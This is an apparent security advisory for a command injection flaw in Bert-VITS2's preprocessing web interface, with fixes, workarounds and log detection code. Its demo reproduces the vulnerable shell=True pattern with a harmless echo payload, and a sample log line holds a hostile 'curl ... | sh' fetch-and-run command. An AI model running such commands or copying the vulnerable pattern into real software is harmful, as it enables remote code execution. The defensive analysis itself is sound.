CVE-2024-39685
📋 TL;DR
CVE-2024-39685 is a critical command injection vulnerability in the preprocessing web interface of Bert-VITS2 (webui_preprocess.py). The value of the data_dir variable, taken from the web interface, is interpolated into a command string that is passed to subprocess.run() with shell=True and no sanitization, so anyone who can submit input to the interface can run arbitrary shell commands with the privileges of the Bert-VITS2 process. Bert-VITS2 version 2.3 and earlier are affected; the risk is greatest for deployments that expose the web interface to untrusted users or networks.
💻 Affected Systems
- Bert-VITS2
📦 What is this software?
Bert-VITS2, a text-to-speech project by fish.audio (GitHub organization fishaudio). The vulnerable component is the preprocessing web interface, webui_preprocess.py.
⚠️ Risk & Real-World Impact
Worst Case
Full system compromise allowing attackers to execute arbitrary commands with the privileges of the Bert-VITS2 process, potentially leading to data theft, ransomware deployment, or complete system takeover.
Likely Case
Remote code execution allowing attackers to run commands, access sensitive data, or pivot to other systems in the network.
If Mitigated
Little to no impact if data_dir is validated and the command is passed to subprocess.run() as an argument list without shell=True: the attacker is then limited to choosing a directory path, and that path should itself be constrained to the expected data tree.
🎯 Exploit Status
Exploitation is trivial: the attacker only needs to place shell metacharacters (for example ;, | or $(...)) in the data_dir field and trigger the preprocessing step, and the shell executes the injected command. Public proof-of-concept details are available in the GitHub Security Lab advisory.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.4 or later
Vendor Advisory: https://github.com/fishaudio/Bert-VITS2/security/advisories
Restart Required: Yes
Instructions:
1. Update Bert-VITS2 to version 2.4 or later.
2. If you cannot update yet, patch the call sites locally: build the command as an argument list and call subprocess.run(argv) without shell=True, so data_dir reaches the child process as a single literal argument instead of being parsed by a shell.
3. Only where a shell is genuinely required, wrap every user-controlled value with shlex.quote() before interpolating it into the command string. Quoting is a fallback, not a substitute for dropping shell=True.
4. Validate data_dir against the expected path format as defence in depth (see the workaround below).
5. Restart the Bert-VITS2 service.
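The vulnerable pattern next to its fixed form, as an added example that is not code from Bert-VITS2 or from the advisory. The helpers run_vulnerable, run_argv, run_quoted_shell, is_safe_data_dir and run_fixed are hypothetical stand-ins for the project's call sites, and the command they execute (a Python one-liner that prints its first argument) replaces the real preprocessing command so that the effect of shell parsing on data_dir is visible. The injection only fires under a POSIX shell (Linux/macOS).

```python
import re
import shlex
import subprocess
import sys

# Stand-in for the preprocessing command: prints whatever arrives as argv[1].
PRINT_ARG = "import sys; print(sys.argv[1])"


def run_vulnerable(data_dir: str) -> str:
    """Reproduces the vulnerable pattern: data_dir is interpolated into a
    command string and handed to a shell, so ';', '|', '$(...)' and similar
    characters inside data_dir are executed as commands."""
    cmd = f"{shlex.quote(sys.executable)} -c {shlex.quote(PRINT_ARG)} {data_dir}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_argv(data_dir: str) -> str:
    """The fix: pass an argument list with shell=False (the default). No shell
    ever sees data_dir, so it reaches the child as one literal argument."""
    argv = [sys.executable, "-c", PRINT_ARG, data_dir]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def run_quoted_shell(data_dir: str) -> str:
    """Only if a shell is unavoidable: shlex.quote() every user-controlled
    value. Weaker than run_argv, because one missed value reopens the hole."""
    cmd = (f"{shlex.quote(sys.executable)} -c {shlex.quote(PRINT_ARG)} "
           f"{shlex.quote(data_dir)}")
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def is_safe_data_dir(data_dir: str) -> bool:
    """Defence in depth on top of shell=False: a plain relative path made of
    safe characters, with no '..' component and no leading '/'."""
    if not re.fullmatch(r"[A-Za-z0-9_\-./]+", data_dir):
        return False
    return not data_dir.startswith("/") and ".." not in data_dir.split("/")


def run_fixed(data_dir: str) -> str:
    """Validated argv execution: what a patched call site should look like."""
    if not is_safe_data_dir(data_dir):
        raise ValueError(f"rejected data_dir: {data_dir!r}")
    return run_argv(data_dir)


if __name__ == "__main__":
    payload = "Data/demo; echo INJECTED"  # constructed attacker input
    print("vulnerable  :", repr(run_vulnerable(payload)))    # 'Data/demo\nINJECTED\n'
    print("argv list   :", repr(run_argv(payload)))          # 'Data/demo; echo INJECTED\n'
    print("quoted shell:", repr(run_quoted_shell(payload)))  # 'Data/demo; echo INJECTED\n'
    try:
        run_fixed(payload)
    except ValueError as exc:
        print("validated   :", exc)
    print("validated   :", repr(run_fixed("Data/demo")))     # 'Data/demo\n'
```

With shell=True the shell splits the string at the ; and runs echo INJECTED as a second command; with an argument list the same string is delivered to the child unchanged, which is why step 2 above is the actual fix and validation is only an extra layer.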
🔧 Temporary Workarounds
Input Validation Workaround
Implement strict input validation for the data_dir parameter so that only an expected relative path is accepted: safe characters only, no '..' components and no leading '/'. This is defence in depth and does not replace removing shell=True.
# Add input validation before subprocess.run()
import re
# Allow only letters, digits, '_', '-', '.', '/'
if not re.match(r'^[a-zA-Z0-9_\-\.\/]+$', data_dir):
    raise ValueError('Invalid data_dir input')
# The allow-list still admits '..' and a leading '/', so reject those too
if data_dir.startswith('/') or '..' in data_dir.split('/'):
    raise ValueError('Invalid data_dir input')
Disable Web Interface
Temporarily disable the web interface until patching is complete.
# Stop the Bert-VITS2 web service (the project ships no systemd unit; substitute the unit name you created)
sudo systemctl stop bert-vits2
# Or kill the preprocessing web UI process directly
pkill -f 'python.*webui_preprocess'
🧯 If You Can't Patch
- Restrict access to the web interface: bind it to localhost or put it behind authentication, so that only trusted users can submit a data_dir value
- Implement network segmentation to isolate Bert-VITS2 instances from critical systems
- Deploy application-level firewall rules to block shell metacharacters (;, |, &, $( and backticks) in request parameters
🔍 How to Verify
Check if Vulnerable:
Check whether webui_preprocess.py builds a command string containing user-controlled variables such as data_dir and passes it to subprocess.run(cmd, shell=True). In the affected commits the relevant code is at lines 46-52 and 130-133 of the file (see the References below).
Check Version:
Bert-VITS2 is run from a git checkout rather than installed as a Python package, so check the version with git describe --tags (or git log -1) in the repository directory, or compare the checkout against the repository version tags.
Verify Fix Applied:
Confirm that no subprocess.run() call in webui_preprocess.py passes a user-controlled string with shell=True (commands are passed as argument lists, or every interpolated value is wrapped with shlex.quote()), and that the checkout is at version 2.4 or higher.
📡 Detection & Monitoring
Log Indicators:
- Unusual subprocess executions from Bert-VITS2 process
- Commands with shell metacharacters in data_dir parameter
- Failed command execution attempts with special characters
Network Indicators:
- HTTP requests to Bert-VITS2 containing shell metacharacters in parameters
- Unusual outbound connections from Bert-VITS2 host
SIEM Query:
source="bert-vits2-access.log" AND (data_dir CONTAINS ";" OR data_dir CONTAINS "|" OR data_dir CONTAINS "&" OR data_dir CONTAINS "$(" OR data_dir CONTAINS "`")
This assumes the request or application log records the submitted data_dir value as a field. Decode URL-encoded values (for example %3B for ";") before matching. Strings such as "subprocess.run" or "shell=True" are source-code tokens and will not appear in runtime logs.
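The detection logic above, run over a handful of log lines, as an added example that is not part of Bert-VITS2 or of the original page. The log format (timestamp, client address, event name, key="value" fields) and the sample lines are constructed for illustration; adapt extract_data_dir() to whatever your reverse proxy or application actually records.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Characters a POSIX shell treats specially. Any of them inside a value that
# should be a plain directory path is a strong command-injection indicator.
SHELL_META = re.compile(r"[;&|`$<>\\\n]")

# Constructed sample lines (hypothetical format, not real Bert-VITS2 output).
SAMPLE_LOG = """\
2024-07-10T12:00:01Z 10.0.0.5 preprocess data_dir="Data/demo" model="demo"
2024-07-10T12:00:07Z 10.0.0.9 preprocess data_dir="Data/demo; curl http://203.0.113.7/x | sh" model="demo"
2024-07-10T12:00:09Z 10.0.0.9 preprocess data_dir="Data%2Fdemo%3Bid" model="demo"
2024-07-10T12:00:15Z 10.0.0.5 preprocess data_dir="Data/$(id)" model="demo"
2024-07-10T12:01:00Z 10.0.0.5 preprocess data_dir="Data/../../etc" model="demo"
"""

FIELD = re.compile(r'data_dir="([^"]*)"')


def extract_data_dir(line: str) -> Optional[str]:
    """Pull the data_dir value out of a line and URL-decode it, so that an
    encoded ';' (%3B) is caught just like a literal one."""
    m = FIELD.search(line)
    return unquote(m.group(1)) if m else None


def classify(value: str) -> Optional[str]:
    """Return a reason string if the value looks hostile, else None."""
    if SHELL_META.search(value):
        return "shell-metacharacter"
    if value.startswith("/") or ".." in value.split("/"):
        return "path-traversal"
    return None


def scan(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, decoded data_dir, reason) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        value = extract_data_dir(line)
        if value is None:
            continue
        reason = classify(value)
        if reason:
            client = line.split()[1]
            hits.append((client, value, reason))
    return hits


if __name__ == "__main__":
    for client, value, reason in scan(SAMPLE_LOG):
        print(f"{reason:20} {client:10} {value!r}")
```

Decoding before matching matters: the third sample line carries the same ; as the second but would slip past a SIEM rule that only matches the literal character.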
🔗 References
- https://github.com/fishaudio/Bert-VITS2/blob/3f8c537f4aeb281df3fb3c455eed9a1b64871a81/webui_preprocess.py#L46-L52
- https://github.com/fishaudio/Bert-VITS2/blob/76653b5b6d657143721df2ed6c5c246b4b1d9277/webui_preprocess.py#L130-L133
- https://securitylab.github.com/advisories/GHSL-2024-045_GHSL-2024-047_fishaudio_Bert-VITS2/